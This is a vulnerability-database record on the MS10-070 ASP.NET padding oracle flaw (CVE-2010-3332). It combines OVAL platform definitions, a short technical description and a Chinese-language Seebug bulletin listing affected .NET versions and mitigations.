    ovaloval:org.mitre.oval:def:12542
  • commentMicrosoft Windows XP (32-bit) is installed
    ovaloval:org.mitre.oval:def:1353
  • commentMicrosoft Windows XP x64 is installed
    ovaloval:org.mitre.oval:def:15247
  • commentMicrosoft Windows Server 2003 (32-bit) is installed
    ovaloval:org.mitre.oval:def:1870
  • commentMicrosoft Windows Server 2003 (x64) is installed
    ovaloval:org.mitre.oval:def:730
  • commentMicrosoft Windows Server 2003 (ia64) Gold is installed
    ovaloval:org.mitre.oval:def:396
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft Windows 7 (32-bit) is installed
    ovaloval:org.mitre.oval:def:6165
  • commentMicrosoft Windows 7 x64 Edition is installed
    ovaloval:org.mitre.oval:def:5950
  • commentMicrosoft Windows Server 2008 R2 x64 Edition is installed
    ovaloval:org.mitre.oval:def:6438
  • commentMicrosoft Windows Server 2008 R2 Itanium-Based Edition is installed
    ovaloval:org.mitre.oval:def:5954
  • commentMicrosoft .NET Framework 4.0 Full is installed
    ovaloval:org.mitre.oval:def:12623
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft .NET Framework 2.0 Service Pack 1 is installed
    ovaloval:org.mitre.oval:def:6428
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft .NET Framework 2.0 Service Pack 2 is installed
    ovaloval:org.mitre.oval:def:6158
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft .NET Framework 2.0 Service Pack 2 is installed
    ovaloval:org.mitre.oval:def:6158
  • commentMicrosoft Windows 7 (32-bit) is installed
    ovaloval:org.mitre.oval:def:6165
  • commentMicrosoft Windows 7 x64 Edition is installed
    ovaloval:org.mitre.oval:def:5950
  • commentMicrosoft Windows Server 2008 R2 x64 Edition is installed
    ovaloval:org.mitre.oval:def:6438
  • commentMicrosoft Windows Server 2008 R2 Itanium-Based Edition is installed
    ovaloval:org.mitre.oval:def:5954
  • commentMicrosoft .NET Framework 3.5 SP1 is installed
    ovaloval:org.mitre.oval:def:12542
descriptionMicrosoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."
familywindows
idoval:org.mitre.oval:def:12365
statusaccepted
submitted2011-02-09T13:00:00
titleASP.NET Padding Oracle Vulnerability
version48

Seebug

bulletinFamilyexploit
descriptionMS10-070 ASP.NET Padding Oracle信息泄露漏洞 1.漏洞描述。 ASP.NET由于加密填充验证过程中处理错误不当,导致存在一个信息泄漏漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据,例如视图状态。 此漏洞还可以用于数据篡改,如果成功利用,可用于解密和篡改服务器加密的数据。 虽然攻击者无法利用此漏洞来执行恶意攻击代码或直接提升他们的用户权限,但此漏洞可用于信息搜集,这些信息可用于进一步攻击受影响的系统。 也就是说虽然不能直接getshell,但是理论上可以读取任意文件,包括数据库配置文件。 2.漏洞标识符: CVE: CVE-2010-3332 3.受影响系统 Microsoft .NET Framework 4.0 Microsoft .NET Framework 3.5 SP1 Microsoft .NET Framework 3.5 Microsoft .NET Framework 2.0 SP2 Microsoft .NET Framework 1.0 SP3 4.漏洞解决办法: 4.1 临时解决办法: * 启用ASP.NET自定义错误并将所有的错误代码都映射到相同的出错页面。 * 创建包含有通用出错消息的error.html文件并保存到根目录。 * 4.2 微软补丁: 微软已经为此发布了一个安全公告(MS10-070)以及相应补丁: http://www.microsoft.com/technet ... 10-070.mspx?pf=true
idSSV:20182
last seen2017-11-19
modified2010-10-17
published2010-10-17
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-20182
titleMS10-070 ASP.NET Padding Oracle File Download